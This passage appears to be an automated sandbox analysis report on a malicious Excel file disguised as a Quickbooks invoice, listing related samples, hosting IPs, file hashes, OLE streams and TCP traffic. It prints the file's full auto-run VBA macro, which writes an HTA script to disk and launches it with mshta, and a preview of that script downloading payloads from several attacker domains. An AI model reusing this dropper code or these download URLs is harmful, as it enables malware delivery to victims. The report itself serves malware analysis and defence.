	Receipt-6218387.xls	Get hash	malicious	Browse
	BhAJLvq0c7.xls	Get hash	malicious	Browse
	PFx3G8Snzk.exe	Get hash	malicious	Browse
	9EP6Gxzv6F.xls	Get hash	malicious	Browse
	2ejCKSIjIV.exe	Get hash	malicious	Browse
	bQWApID6av.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
onlinefastsolutions.com	Receipt-6218387.xls	Get hash	malicious	Browse	185.21.216.153

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CMRU-AS-APChiangmaiRajabhatUniversityTH	ldE25Snd1f.exe	Get hash	malicious	Browse	202.29.60.34
	Receipt-6218387.xls	Get hash	malicious	Browse	202.29.60.34
	BhAJLvq0c7.xls	Get hash	malicious	Browse	202.29.60.34
	PFx3G8Snzk.exe	Get hash	malicious	Browse	202.29.60.34
	9EP6Gxzv6F.xls	Get hash	malicious	Browse	202.29.60.34
	2ejCKSIjIV.exe	Get hash	malicious	Browse	202.29.60.34
	bQWApID6av.xls	Get hash	malicious	Browse	202.29.60.34
HETZNER-ASDE	ldE25Snd1f.exe	Get hash	malicious	Browse	78.46.78.42
	2aJ9QdIdFE.exe	Get hash	malicious	Browse	195.201.225.248
	EA4LughYnY.exe	Get hash	malicious	Browse	195.201.225.248
	Receipt-6218387.xls	Get hash	malicious	Browse	78.46.78.42
	etSPaoVcAD.exe	Get hash	malicious	Browse	195.201.225.248
	VwC7ZwYCLH.exe	Get hash	malicious	Browse	195.201.225.248
	BhAJLvq0c7.xls	Get hash	malicious	Browse	78.46.78.42
	kxQkjkU9DO.exe	Get hash	malicious	Browse	195.201.225.248
	PFx3G8Snzk.exe	Get hash	malicious	Browse	78.46.78.42
	9CMjcYFBxo.exe	Get hash	malicious	Browse	195.201.225.248
	jDnYtpTxyZ.exe	Get hash	malicious	Browse	88.99.66.31
	JvlwIeO09R.exe	Get hash	malicious	Browse	195.201.225.248
	9EP6Gxzv6F.xls	Get hash	malicious	Browse	78.46.78.42
	2ejCKSIjIV.exe	Get hash	malicious	Browse	78.46.78.42
	SMIym2zwaL.exe	Get hash	malicious	Browse	116.202.183.50
	KHK8O5BT50.exe	Get hash	malicious	Browse	88.99.66.31
	bQWApID6av.xls	Get hash	malicious	Browse	78.46.78.42
	pEIro35JRJ.exe	Get hash	malicious	Browse	195.201.225.248
	KHK8O5BT50.exe	Get hash	malicious	Browse	88.99.66.31
	AEdU8eJHgN.exe	Get hash	malicious	Browse	195.201.225.248
CLEAR-RATE-COMMUNICATIONSUS	BhAJLvq0c7.xls	Get hash	malicious	Browse	208.83.69.35
CLEAR-RATE-COMMUNICATIONSUS	bQWApID6av.xls	Get hash	malicious	Browse	208.83.69.35

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\qDialogMainChartType.exe Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	167936
Entropy (8bit):	7.4919139330417055
Encrypted:	false
SSDEEP:	3072:hWiJzQu5JD9ko9WY1wzxWrPAEN87L5cWlvsRwmhnxONgkf:hLquAkPAE+X5WncNgk
MD5:	EA91555829C1DFDFD47709496461C5D6
SHA1:	801A1C4AB318D6E7168208315991E68CF9991A09
SHA-256:	9FFE349BFCAAC3CEFFBBB5ACCF85814B0E08D204A02B63A9DF9681235A464ECC
SHA-512:	F8856CFD16D5BE0295CDDDBCF5808E38C781C73A8266A97A1AFF8FA2450B36C28DF5E841BF20F596AE27B686A4D2CC5DC7918B330E04B92CB4FDCBECE1AE265B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 30%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..........................................................Rich............PE..L......`.................@...P.......>.......P............................................@..........................R..]....R..h....... ............................Q..8............................................P...............................text....8.......@.................. ..`.rdata.......P.......P..............@..@.data...X....`.......`..............@....rsrc................p..............@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\qRangeAutoFormatLocalFormat3.sct Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	5621
Entropy (8bit):	4.787304123915109
Encrypted:	false
SSDEEP:	96:CgAe+y62lIJ62lIAh62lIu62lInv62lIyHJyhn62lIr:hxlIvlIMlIOlInllIwyhtlIr
MD5:	E89821BB7E096EEB132D68B2A6676C11
SHA1:	BA823128686693A41A2B5654C5C98D5E2C67D237
SHA-256:	F42045365D89DE42726C7CA059AC19FE456EDE3F75DD7E402316C0491358DB63
SHA-512:	B26AE3BD30E3240F597823EE3EA29705EF658797D3B0B1760DEB71E53DAF9C7B06B58712EA9EDAE954B785007FF9344CFF926506774489E5868A6A5CEBD43A14
Malicious:	true
Reputation:	low
Preview:	<!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="Test"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">......<script type="text/vbscript" LANGUAGE="VBScript" >..On Error Resume Next..For Each qDialogWorkbookCopy in Array("http://onlinefastsolutions.com:8088/tpls/file3.bin","http://onlinefastsolutions.com:8088/images/details.bin","http://fasteasyupdates.com:8088/vendors/file4.bin","http://onlinefastsolutions.com:8088/js/file1.bin","http://buyer-remindment.com:8088/fonts/file8.bin","http://buyer-remindment.com:8088/css/file7.bin","http://onlinefastsolutions.com:8088/images/file13.bin","http://insiderushings.com:8088/js/file13.bin","http://buyer-remindment.com:8088/tpls/file4.bin","http://paymentadvisry.com:8088/wp-theme/file7.bin").. Set qDialogWorkspace = createobject("MSXML2.ServerXMLHTTP.6.0").. 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred ci

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Invoice 720710 from Quickbooks, LLC, Author: Quickbooks, LLC, Last Saved By: user, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jul 14 09:38:23 2021, Last Saved Time/Date: Wed Jul 14 15:06:14 2021, Security: 0
Entropy (8bit):	7.524113368644345
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	4TWEQh2HJb.xls
File size:	728064
MD5:	40425d09e54ff26289dd074649f0cad9
SHA1:	ae7e4df26092d9acf01b732c8144f0170ccc6556
SHA256:	6f8f1b26324ea0f3f566fbdcb4a61eb92d054ccf0300c52b3549c774056b8f02
SHA512:	db62ee5908d05d96ca63a852880f79b8ad584d4d7490543e50801d2dcdbb62faab3f311263b14e0ce6e0f6d349be94953dd0d532992739ca71684ad7f4f8dfb7
SSDEEP:	12288:IRYbXrlUc6XS/CwRl+4MW1H5onZHBDznxcp/c0UGtkbByxlFYd2Drpkk:LUc6EjDMW1UrDjxcNcfgZI2
File Content Preview:	........................>...................................z...................b.......d.......f.......h.......j..............................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "4TWEQh2HJb.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:	Invoice 720710 from Quickbooks, LLC
Author:	Quickbooks, LLC
Last Saved By:	user
Create Time:	2021-07-14 08:38:23
Last Saved Time:	2021-07-14 14:06:14
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:	Quickbooks, LLC
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e2 0d f0 79 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 2109

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	2109
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 ef 05 00 00 00 00 00 00 01 00 00 00 e2 0d 10 70 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
qHundredMillions.Value
qHundredMillions
VB_Name
VB_Creatable
"ThisWorkbook"
VB_Exposed
CreateObject("Wscript.Shell")
qLine.Write
qLine.Close
qLine
VB_Customizable
CreateObject("Scripting.FileSystemObject")
.CreateTextFile(Environ("ALLUSERSPROFILE")
qUnlockedCells
(qUnlockedCells)
VB_Base
WorkBook_Open()
Environ("ALLUSERSPROFILE")
VB_TemplateDerived
False
.Exec
Attribute
Chr(qHundredMillions.Value)
VB_PredeclaredId
("mshta
VB_GlobalNameSpace

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_Open()
    For Each qHundredMillions In ActiveWorkbook.Sheets("Sheet1").Range("A65:O2886")
        If qHundredMillions.Value > 0 Then
            qUnlockedCells = qUnlockedCells & Chr(qHundredMillions.Value)
        End If
    Next qHundredMillions
Set qPCX = CreateObject("Scripting.FileSystemObject")
    With qPCX
        Set qLine = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")
qLine.Write (qUnlockedCells)
qLine.Close
    End With
With CreateObject("Wscript.Shell")
.Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
End With
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.25248375193
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 256

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	256
Entropy:	3.03601128578
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q u i c k b o o k s , L L C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 70 00 00 00 0b 00 00 00 78 00 00 00 10 00 00 00 80 00 00 00 13 00 00 00 88 00 00 00 16 00 00 00 90 00 00 00 0d 00 00 00 98 00 00 00 0c 00 00 00 ab 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 268

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	268
Entropy:	4.0356183074
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . I n v o i c e 7 2 0 7 1 0 f r o m Q u i c k b o o k s , L L C . . . . . . . . . Q u i c k b o o k s , L L C . . . . . . . . . u s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ) . . . x . . @ . . . . . . h
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 dc 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 02 00 00 00 50 00 00 00 04 00 00 00 7c 00 00 00 08 00 00 00 94 00 00 00 12 00 00 00 a4 00 00 00 0c 00 00 00 bc 00 00 00 0d 00 00 00 c8 00 00 00 13 00 00 00 d4 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 711057

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	711057
Entropy:	7.56836681766
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . u s e r B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . ^ . " 8 . . . . . . . X . @
Data Raw:	09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 75 73 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 422

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	422
Entropy:	5.30451258671
Base64 Encoded:	True
Data ASCII:	I D = " { 5 1 9 F 3 9 B 8 - 0 0 7 3 - 4 D 4 C - B 6 E 0 - 1 A C 8 3 6 5 4 5 9 7 B } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 6 3 4 F 5 C 1 1 D C 1 5 7 C 5 5 7 C 5 5 7 C 5 5 7 C 5 " . . D P B = " 6 C 6 E A F 0 7 D 3 3 C D 4 3 C D 4 3 C " . . G C = " A 2 A 0 6 1 5 5 9 6
Data Raw:	49 44 3d 22 7b 35 31 39 46 33 39 42 38 2d 30 30 37 33 2d 34 44 34 43 2d 42 36 45 30 2d 31 41 43 38 33 36 35 34 35 39 37 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	62
Entropy:	3.05546715432
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2623

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2623
Entropy:	4.14656415449
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 515

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	515
Entropy:	6.30596515268
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . d . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ s y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 ff b1 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 fd 64 e5 62 06 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 14, 2021 20:00:06.329454899 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.454039097 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.454212904 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.454802990 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.575582027 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.811981916 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.812005997 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.812019110 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.812030077 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.812164068 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.929562092 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.929584980 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.929596901 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.929609060 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.929630995 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.929754972 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.929763079 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932425022 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932456017 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932493925 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932562113 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.932615042 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932631016 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932646990 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932660103 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932683945 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.932722092 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.932755947 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.933494091 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.050087929 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050106049 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050118923 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050187111 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.050225019 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050265074 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050270081 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.050606012 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050657988 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.050843000 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050965071 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.051048994 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.051079035 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.051099062 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.051136017 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.051177979 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.052927017 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.052943945 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053004026 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053020954 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053076982 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053106070 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053117037 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053123951 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053144932 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053164005 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053164959 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053181887 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053203106 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053203106 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053240061 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053251982 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053277016 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053335905 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053375959 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053395987 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053500891 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053865910 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.164964914 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.165010929 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.165023088 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.165040016 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.165179014 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.170593977 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170614958 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170629025 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170681953 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170753956 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170792103 CEST	49165	8088	192.168.2.22	208.83.69.35
